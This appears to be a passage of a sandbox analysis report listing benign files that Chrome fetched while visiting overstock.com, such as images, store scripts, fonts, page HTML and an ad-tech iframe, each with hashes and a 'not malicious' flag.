                                                                                                                                                                                    Preview:!function(){var t={6173:function(t,e,n){var r;t.exports=(r=r||function(t,e){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&void 0!==n.g&&n.g.crypto&&(r=n.g.crypto),!r)try{r=n(2480)}catch(t){}var i=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof r.randomBytes)try{return r.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")},o=Object.create||function(){function t(){}return function(e){var n;return t.prototype=e,n=new t,t.prototype=null,n}}(),a={},c=a.lib={},u=c.Base={extend:function(t){var e=o(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                    Entropy (8bit):2.9881439641616536
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                    MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                    SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                    SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                    SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:Rn:R
                                                                                                                                                                                    MD5:7BC0EE636B3B83484FC3B9348863BD22
                                                                                                                                                                                    SHA1:EBBFFB7D7EA5362A22BFA1BAB0BFDEB1617CD610
                                                                                                                                                                                    SHA-256:A2C2339691FC48FBD14FB307292DFF3E21222712D9240810742D7DF0C6D74DFB
                                                                                                                                                                                    SHA-512:4D094B64124366530E7E327B1AD5D06C0FD1CEB96387D6A143E9F561C2F9FF7CA9D68E7C23B8B14AAB5309C202A8DCED9A38D950662A50984D2841577293CD64
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview://
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1863
                                                                                                                                                                                    Entropy (8bit):6.619986925436641
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZwVHXTTI61mL9nNeVaf/Bla0qj+8ZprEFoafE:NBIl/XflVxCVwnJUVA9qj2For
                                                                                                                                                                                    MD5:BFF186D5BC5B26BC0700E77157682B82
                                                                                                                                                                                    SHA1:BBB7DA8B733B2E2A48E73696215A38DB7DCD6781
                                                                                                                                                                                    SHA-256:C8AE71FCAC5D6837BB5B00FA3A1E88A368792EA7B67F6AAF0976F3CD6DD35D31
                                                                                                                                                                                    SHA-512:476709093B4BCD75EB3BC106FD6FC3D48F5A3848ED4468DFBD88658E045AA9873F13154C6AFBB440F056D90BE2412E1AB76B8B10AB4ED5271A9DB7A9188B73F6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..........................................................................................h|.P.J)....#k.u.S...f.......W..N].UV..23..5..9.6J...r.:.Y................?.........................!....1AQa..".. 3@dq..%&2
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (3113)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):97148
                                                                                                                                                                                    Entropy (8bit):4.816769827704925
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:2iVgjKXNLOiMzqTTlANlKdAblBBACksWFwcPxibCu+BxvDp0:SjKXNLOiMzrBAwIwcPWsxvG
                                                                                                                                                                                    MD5:D571B59F501ABBB47EC750139120C900
                                                                                                                                                                                    SHA1:BBC390CF4E067312F5BDB9B292CFFAB9C716CE69
                                                                                                                                                                                    SHA-256:B68BD76B43B3E896AD523C8706A7F7341ABF1429B4582737860F038DAB7D6396
                                                                                                                                                                                    SHA-512:A4D64B0651BF7F50594547FEBAFC6D38C0CD85207707646D9C950F0F0713BF2729E5214EBD1EE068DE2E20382D47B77503AB0B17B7F9A2960421CDF9B5F05BFE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:console.log("inside customDiscount.js");..const BXGY_ICONS = {. DISCOUNT_TAG_ICON_FILL : `<svg xmlns="http://www.w3.org/2000/svg" width="40" height="40" viewBox="0 0 40 40" fill="none">.<path fill-rule="evenodd" clip-rule="evenodd" d="M20.2835 5.83398C21.4002 5.83398 22.4502 6.26732 23.2335 7.05065L32.7502 16.5673C34.6502 18.4673 34.6502 21.534 32.7502 23.434L23.4335 32.7507C21.5168 34.6673 18.4335 34.634 16.5668 32.7507L7.05016 23.234C6.26683 22.434 5.8335 21.4007 5.8335 20.284V9.51732C5.8335 7.48398 7.4835 5.83398 9.51683 5.83398H20.2835ZM20.1002 13.6507C19.1335 12.684 17.5335 12.684 16.5668 13.6507C15.6002 14.6173 15.6002 16.2173 16.5668 17.184C17.5335 18.1673 19.1168 18.1507 20.1002 17.184C21.0668 16.2173 21.0668 14.6173 20.1002 13.6507ZM10.0002 10.834C10.0002 11.3007 10.3668 11.6673 10.8335 11.6673C11.3002 11.6673 11.6668 11.3007 11.6668 10.834C11.6668 10.3673 11.3002 10.0007 10.8335 10.0007C10.3668 10.0007 10.0002 10.3673 10.0002 10.834ZM19.9002 26.3507C20.8835 27.334 22.4668 27
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 650x366, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):54661
                                                                                                                                                                                    Entropy (8bit):7.9504372233747045
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:Q+2CL6jM/HF6TWwQCraVr0M+960dT0Qbl:Qrw/HF6T9g0Mi60Hbl
                                                                                                                                                                                    MD5:627BC07F2678645794D50A68D23C8C45
                                                                                                                                                                                    SHA1:B2E56C29C9A3E32F68505C0B30BAC57401124451
                                                                                                                                                                                    SHA-256:253CCDF9651115EC1864931F3AB279F3B9035289D2DA53C9C3A6798C4B55741E
                                                                                                                                                                                    SHA-512:027489B6DAE749713639035C3413B9CA037B2E2BC95D800D311CCD6846E9FCC871A63D9371B09C4378691B9C3D483294725532586FF43C7BD603EAE08483E086
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................n...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......n.............................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):35978
                                                                                                                                                                                    Entropy (8bit):4.9214403502286475
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:kKzXbKOIEkFaXHXdXGXO523FkcKJROfi6VVeqOO:kKzXbfIbaXHXdXGXO523KcKJROfi6VV9
                                                                                                                                                                                    MD5:CD97A8EA77B570DC426DE8111060CA4D
                                                                                                                                                                                    SHA1:976C508F2F407AE72C2E7DE92F045D62EB25AA1D
                                                                                                                                                                                    SHA-256:AA77E2479AC8572217DD35D3A2C9D283E06E2D831B2F3B7BCA4AF24683FEFAF3
                                                                                                                                                                                    SHA-512:2B7A0103474EABC36780126CAAB362AC56DB9337CF5E4367E0B0A84DE7C0015E1CB6DE35D968106E2124DF0419E36996B4123FA847B6608B2D84D4102DDD7B14
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:console.log("inside shippingDiscount.js");..let gfgShippingDiscountV2 = {. state: {. isFirstRenderForShippingDiscount: true,. productFound: {},. productVariantFrount: {},. collectionFound: {},. appBlockKeyMap: {. tBarHeadingFontSize: "titleBarHeadingFontSize",. tBarHeadingFontWt: "titleBarHeadingFontWeight",. tBarSubHeadingFontSize: "titleBarSubHeadingFontSize",. tBarSubHeadingFontWt: "titleBarSubHeadingFontWeight",. tBarTextColor: "titleBarTextColor",. tBarBackgroundColor: "titleBarBackgroundColor",. widgetBodyFontSize: "widgetBodyFontSize",. widgetBodyFontWt: "widgetBodyFontWeight",. widgetBodyBackgroundColor: "widgetBodyBackgroundColor",. widgetBodyBorderColor: "widgetBodyBorderColor",. },. },. init: function () {. try {. let settings = gfg.settings;. let _shippingDiscountData = settings.shippingDiscount;.. const page_type = gfg.f.getPageType();. if (page_type === "product") {. gfgSh
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1514
                                                                                                                                                                                    Entropy (8bit):6.7288167911707175
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:TATCIl/X2YlXWI2PUhtxSxupW/IrwXafrmNWqhSpgZDpmnMRJ7kIZ0:xIl/Xflf/Z+qfrBjgZVBRBP0
                                                                                                                                                                                    MD5:C78814C29DCFE24BF7E6419CD97AEB1D
                                                                                                                                                                                    SHA1:FBF1B35059E0B90EC5C6CC659F7D6DF53795A968
                                                                                                                                                                                    SHA-256:17C7121CC9CADFDE92F820A5F5E701A36AC2E2C5FEDB85EDAAB5B344F8CF9331
                                                                                                                                                                                    SHA-512:5186A89418BA64AACA4D74F177660B48419EC4E6379E6A2A302D35EAF3BB944E7EA0BFF0C49F6ED14E6123E293BA8D2430939721EB963A075177A5FD9813B887
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_9002dd94-b46f-4f5c-974f-27ed808adb8a.jpg?v=1729322885&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 R........*P.P.>1..B.!!.Y=. ....i.I=..3....S.t.&>..%$.1.wQq.p+..O...v..{.......-J...."DX.H...h.J...\...~spQ0.zO.....3.9`|..W.$.r.z.....x...[.....}.........;2.Xg......$Y~j.D..*.-..8.g..u.l..hO..{/....(...k;n.G.1....t.].B.<N.T.;].......l.n.D."........1.7.."..T.0~.Q.....Os....;R..E.%9......TIQ.!.&?..Hfu...T...U`D.#.%....wy..W......D.e..l..0.,1...!...Q.R@.ER.......R.Qx,4.n...-.K..R...S....}../..py.E...Ate...u..@.......Dh..\!Mp..S..r...r..|.....G.5^....H6n4.Y8!.:%.Gf.DX....4h?G......k.$.)..b;t..?]....m..==.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (23092)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):28315
                                                                                                                                                                                    Entropy (8bit):5.250814308268855
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:kcUmVmrm10wXkGQxNV1Z/9WNa/Y1urHFqn10NCMw01invcauUCipwK9tqTPCH0id:kcUmV4m1XXkGQxNV1Z/9WNauurHFqn1t
                                                                                                                                                                                    MD5:4FD0680EED907ADAF3F85849C393D688
                                                                                                                                                                                    SHA1:B37DB94DF8A3F1457DAA5DB860D93772311BA5E4
                                                                                                                                                                                    SHA-256:7AB04D2682AEB63A3FAC2930C5C21A2C922A811A1B32AAFBEF1B58595E0A9E03
                                                                                                                                                                                    SHA-512:5AE518308F079DB8AD1749A6D85BC7B86D9315B660355EAC06D82D683697A23F0AE5415F281449434A86049CF195752B39A33AEBC5ACAAF7317DD7E5606FC82D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(()=>{var ne=Object.create;var mt=Object.defineProperty;var se=Object.getOwnPropertyDescriptor;var ce=Object.getOwnPropertyNames;var le=Object.getPrototypeOf,ue=Object.prototype.hasOwnProperty;var m=(t,e)=>()=>(t&&(e=t(t=0)),e);var fe=(t,e)=>()=>(e||t((e={exports:{}}).exports,e),e.exports);var de=(t,e,i,a)=>{if(e&&typeof e=="object"||typeof e=="function")for(let o of ce(e))!ue.call(t,o)&&o!==i&&mt(t,o,{get:()=>e[o],enumerable:!(a=se(e,o))||a.enumerable});return t};var pe=(t,e,i)=>(i=t!=null?ne(le(t)):{},de(e||!t||!t.__esModule?mt(i,"default",{value:t,enumerable:!0}):i,t));var r=(t,e,i)=>new Promise((a,o)=>{var s=f=>{try{c(i.next(f))}catch(d){o(d)}},n=f=>{try{c(i.throw(f))}catch(d){o(d)}},c=f=>f.done?a(f.value):Promise.resolve(f.value).then(s,n);c((i=i.apply(t,e)).next())});function ge(){_e(),ye(),Ee(),Oe()}function _e(){try{Object.prototype.entries||Object.defineProperty(Object.prototype,"entries",{configurable:!0,writable:!0,value(){return he(this)}})}catch(t){}}function he(t){return
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1560)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1775
                                                                                                                                                                                    Entropy (8bit):5.0855295906697
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:dvPioG+d99D9ND9dKh2EZGS1eYzs9SHgm4:tP6u9RNRdKbgMGSM
                                                                                                                                                                                    MD5:A5A0C9048EFB7CB5DF90023064D09BA4
                                                                                                                                                                                    SHA1:9669B2608D986D4742DD2C0C114B148B6CDB5CDE
                                                                                                                                                                                    SHA-256:DDFBE9EE1F7088339A85FA25A259765ADE4258C082A7921B9F569FF9616F904A
                                                                                                                                                                                    SHA-512:97ED945E9CEFE0C070946F5D97E9D641FB7B1D9EC710DC3865D307E9F59E07D238084699D3C4E52E2F470A207AEE0E19C9C1939333DFEF041769976A0F5F1B48
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ka-f.fontawesome.com/releases/v6.6.0/css/free-v4-font-face.min.css?token=541968e6a0
                                                                                                                                                                                    Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-solid-900.woff2) format("woff2"),url(../webfonts/free-fa-solid-900.ttf) format("truetype")}@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-brands-400.woff2) format("woff2"),url(../webfonts/free-fa-brands-400.ttf) format("truetype")}@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-regular-400.woff2) format("woff2"),url(../webfonts/free-fa-regular-400.ttf) format("truetype");unicode-range:u+f003,u+f006,u+f014,u+f016-f017,u+f01a-f01b,u+f01d,u+f022,u+f03e,u+f044,u+f046,u+f05c-f05d,u+f06e,u+f070,u+f087-f088,u+f08a,u+f094,u+f096-f097,u+f09d,u+f0a0,u+f0a2,u+f0a4-f0a7,u+f0c5,u+f0c7,u+f0e5-f0e6,u+f0eb,u+f0f6-f0f8,u+f10c,u+f114-f
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (58819)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2649006
                                                                                                                                                                                    Entropy (8bit):5.309152648800984
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:W6F55+RNoE0ehD2vByjVEJYJGrZ9RlyMkI2c+OC5yXJSMg4uz8ScBoRqw+YGK2Lh:W6Fv+ksUBYLFr1+Vz
                                                                                                                                                                                    MD5:1703149E8045DA7DCD82266D9B192B5D
                                                                                                                                                                                    SHA1:29954A3A7805E5BE0FFC36807A0E27194C58F91A
                                                                                                                                                                                    SHA-256:D3332B067523040B892E7447D4A1B0E72648173957D50B4A2529329DF2B9984A
                                                                                                                                                                                    SHA-512:F64285F870F82C5A2632192720231B3F014B24BA957335FF180C7C86C938D0C7726002EA42351FA6553FE0CC94703539C60ACF207A5839F7BDD231BF0EAFF6F2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/collections/fencing
                                                                                                                                                                                    Preview:<!doctype html>.<html class="no-js" lang="en" dir="ltr">.<head>. <script>. if (!window.DOMAINE) window.DOMAINE = {};. window.DOMAINE.technical = {. apiVersion: "2024-07",. storefrontToken: "72e5b536982e2714efe8f8314d50d8f3",. shopName: "a37a28-2.myshopify.com",. localization: {. countryCode: "US",. currencyCode: "USD". }. };.</script>.. <script>. const _url = new URL("https://www.overstock.com/collections/fencing").. if (_url.host === 'a37a28-2.myshopify.com' || _url.host === 'checkout.overstock.com') {. _url.host = 'www.overstock.com';. window.location = _url.toString();. }.. if (_url.pathname === '/account/login') {. const loginURL = new URL('?redirect_to=https%3A%2F%2Fwww.overstock.com%2F', 'https://login.overstock.com');. window.location = loginURL.toString();. }. . const query = new URLSearchParams(window.location.search).get('q')?.toLowerCase();. const path = window.location.pathname;.. if (path === '/se
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1183
                                                                                                                                                                                    Entropy (8bit):4.748678484590553
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YMIfgqWnLH5iLeZiM6pLkqLNpGL6AWL7qsLtmLgESLUqVLV:YBoLnLHILewpL3LNkL6HLjLQLg/LJLV
                                                                                                                                                                                    MD5:2B722B0C0D6275E3CE5CF39862A59DC1
                                                                                                                                                                                    SHA1:A6772E1E62F08228652FC36BAFC23EF16AF7D07F
                                                                                                                                                                                    SHA-256:87F6C8BB522FBFB1B37768B3E21DE5235675A283B3BCE8AA92F4DE73B78F8DEF
                                                                                                                                                                                    SHA-512:201FB0152A097F00FE7D2AE3B2F5AD6B056A90D2C5B5BD68FF99ECB8FD4345FE0F10BF0CF881B0CCA092522843277B04619A2B96361D30246DE4F1B84C4A8D9B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"10673336","rollup":{"average_rating":4.14,"rating_count":568,"review_count":568,"answered_questions":0}},{"page_id":"37459457","rollup":{"average_rating":4.09,"rating_count":34,"review_count":34,"answered_questions":0}},{"page_id":"38169103","rollup":{"average_rating":4.5,"rating_count":12,"review_count":12,"answered_questions":0}},{"page_id":"39181892","rollup":{"average_rating":4.5,"rating_count":26,"review_count":26,"answered_questions":0}},{"page_id":"39904157","rollup":{"average_rating":4.92,"rating_count":13,"review_count":13,"answered_questions":0}},{"page_id":"18104891","rollup":{"average_rating":4.61,"rating_count":31,"review_count":31,"answered_questions":0}},{"page_id":"20000656","rollup":{"average_rating":4.72,"rating_count":166,"review_count":166,"answered_questions":0}},{"page_id":"22835495","rollup":{"average_rating":4.76,"rating_count":25,"review_count":25,"answered_questions":0}},{"page_id":"28273451","rollup":{"average_rating":
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 19252, version 1.0
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):19252
                                                                                                                                                                                    Entropy (8bit):7.990065631468077
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:384:9w3qPmaUiP5SfQZ19f2ogZqh37xiJXCwDccFMHntLZhhcC+P/Qm8pob4vAY8MCtG:eaOyhW01g0xYxvccAtmC+p8ybHJG
                                                                                                                                                                                    MD5:3081AE959E35D7DFA394138443E9095E
                                                                                                                                                                                    SHA1:FE093FE9CA22A15354813C912484945A36B79146
                                                                                                                                                                                    SHA-256:DE60693F31597C2EC2C1BD972D15900B6BB7BE2BCC19DB7B71BD171469B7DBE0
                                                                                                                                                                                    SHA-512:82A9064BE73A985B3D30995EC49985EEEEC2223EAF624E2DC7DC57D4BA82D0B804B32DA11817C4268CA51D2B88689A9780D4B6130BA327E85F69F9E4109AAF6B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://fonts.shopifycdn.com/helvetica/helvetica_n4.fe093fe9ca22a15354813c912484945a36b79146.woff2?h1=b3ZlcnN0b2NrLmNvbQ&hmac=b17005b8de9d58b8bf1d72e284cfa56571f24c5706b0774b2c810e4e87391ba4
                                                                                                                                                                                    Preview:wOF2......K4..........J..........................`..`..x..`..4.....(..I.6.$.....L.. .,. ..V.P.5x.*..Y..[.F!. ..(e.N...B..2,`...Z...*.....`-..k.....`....2|..PO..s.<fU2E$./gE~3.>.=.j@.GP..c...$.........H$..m@...[..6..9.U.....E.fw....."..Gh.\?~.;T$QgL.pI.$.....&..6H...tfv.0@-o.Q7..."...|0...^V.*.....f...FT.).H.t..-q..H.U...N..G..S?.....K........?(..eY..$.P:.......;.S...7<..". ............X.$.6m....n..E..-9~'k..L..W.........'z~...1K*!.T..&"......-.i..n.t.?..jD...J..WU........||......Hwa..MZ];UJ.....3,......%?....W.3..6.._H.C.......g.i.b..j4....L../....q$H}.N.O....Z...n....r.T.Ig.y/3.Q:...(.+.......m.}.'H .Kf..M.. ...<.z.!mPHr..v..............E.....;.FK..GK.!.h..IK'$B.P.T..pq+(.N...(9J..N!?/....`g........$. (QT...W...".....K.2.Y6.pgR....!.B.?.u!.......W...em.%f(.;.,.\QY{|.Vf...C`...4.{.............,.^R."...ES...p.K.Mv..D..F.......f..D.x.......{...e'.k......f...AZ~...........Px.O......4.6.O..2.rgu...8.....C..B.b........B*."
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1024x1024, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):202488
                                                                                                                                                                                    Entropy (8bit):7.999101515228727
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:3072:rF7jhIecLF+zSGefyY8UaHrzgg0XFpzT3ocJO+GgiIrtcMBjt0q6zdC2Y20yd8X:rBjpcyYCrzUzT3osr5rmYAzQFcS
                                                                                                                                                                                    MD5:08532E4DD9EB00EDA3901B3555519E1D
                                                                                                                                                                                    SHA1:C15239FDE155222414A8830E31FAF5187DC57CD5
                                                                                                                                                                                    SHA-256:CF974AE25323501F825EEC767FA9FD585614BE4B4BD889DAD483CB3B47C09765
                                                                                                                                                                                    SHA-512:159DD978AFFAF14FDB4C3D639993F37BF96737FD96D2DA5970C5DCFB55A378FA214B1886A7A114B5CF3D59ADFBAD17326951D56CF84553AA03B7F038F034DCDA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/images/products/is/images/direct/8bdce09ec8d086ed41ad8b72167004cf23736f2b/Apmir-Super-Bright-Front-and-Back-LED-Lighted-Anti-Fog-Wall-Bathroom-Vanity-Mirror-in-Tempered-Glass-%26-ETL.jpg?imwidth=900&impolicy=high
                                                                                                                                                                                    Preview:RIFF....WEBPVP8 .....M...*....>-..C!.!.+.........#a..G..<.s.^.g.....a..@........f<..._..OF.5.|.W....m...g-...?zJ8.Y...........}3.A.....k.......4.........7...?.x?.?.?.................?.....z~o.o.1......._.....?......_.c.'..}......I..............................u...3......._...}......../.k.g.?................g........................>...?...z_........3.....:.0...7.o.?.....~.....|./...?.>.}.}......?.~.}........K.U.G.......!...H.!.......?._G.m......._.....................;........g....................U...........?.?x.......'.....v...3.?................E.....?.?.............._R...Q..........B?..k...'..............].#......._..........E.........@.V....C.q.....g..HyJs\.....|9_......V.........%f..'19s.d.....{%.aO..F......Q..OnS.jZM.%..K....H1..].2y.P....2...Ra.$......}._2N.7..........Tp...|.?}.*...%.W..Tl.o.^n=n...i...Pc/....+.0A..T..[#....GfY.....c.W.{.&K.#.XM%.*6.#l+.q..9.r......9W.7..X....y7........e...v.....O........u.2.K.#.3.}./y...D...-..pW.n..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (1995), with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):5839
                                                                                                                                                                                    Entropy (8bit):5.6579532763322415
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:5i6LVdAWhrY113pKuktIasDaIXAw28ZxAf8F3Oa:5iwVOPkWasPXC8/4aOa
                                                                                                                                                                                    MD5:9ABC1D7B8156302DF1E7FEAC07F8D6BE
                                                                                                                                                                                    SHA1:D8E2BCA326B8F4792EBCCA9083A48C70506606EB
                                                                                                                                                                                    SHA-256:6DB5553D8A78F0B43C03BA953839B29FFBA0F42B3554A6D6AAA26AAB8300B60C
                                                                                                                                                                                    SHA-512:865DDE9665541D92DA0D06746FA6B51EF80F2E297628DC2FD3EDCD09C4D6ED51368A19434E44AF90291E5E9864B85D0FF10060D98387B9A7ADF5A2E37A8C654B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://fledge.us.criteo.com/interest-group?data=daZCiXxubDNuNzVVZTdmeFc4T3dGMnZ6SkpTLzBkNVdsSzJibXVBeXpVM25jNEsvUVFUVUlrcDBnNEdIVGpYSVRSbmh5WDdPWDJYaWd3TUVuZS9XZzFKWmhDcXpGazB4RGw3b0NCZE03YWthdTluQT18
                                                                                                                                                                                    Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <title>Fledge IFrame</title>..</head>..<body>....<script>.. function getBswIg(src) {.. const elt = document.createElement("iframe");.. elt.allow = "join-ad-interest-group";.. elt.width = "0";.. elt.height = "0";.. elt.style.display = "none";.. elt.title = "BSW IG";.. elt.src = src;.... document.body.appendChild(elt);.. }.... if (!navigator.joinAdInterestGroup) {.. console.log("No fledge for you!");.. } else {.. var igs =[{"owner":"https://fledge.us.criteo.com","name":"0DE64HxtMWxCd05OY0tNRk16ZjZSTWNxTHFnPT18","lifetimeMs":2592000000,"priorityVector":{"browserSignals.ageInMinutes":-1,"browserSignals.one":86400},"biddingLogicURL":"https://fledge.us.criteo.com/simplebid?platform=us","biddingWasmHelperURL":"https://fledge.us.criteo.com/criteo.wasm","trustedBiddingSignalsURL":"https://fledge.us.criteo.com/getvalues","trustedBiddingSignalsKeys":["Y85qt3xweFZBVXR1NX
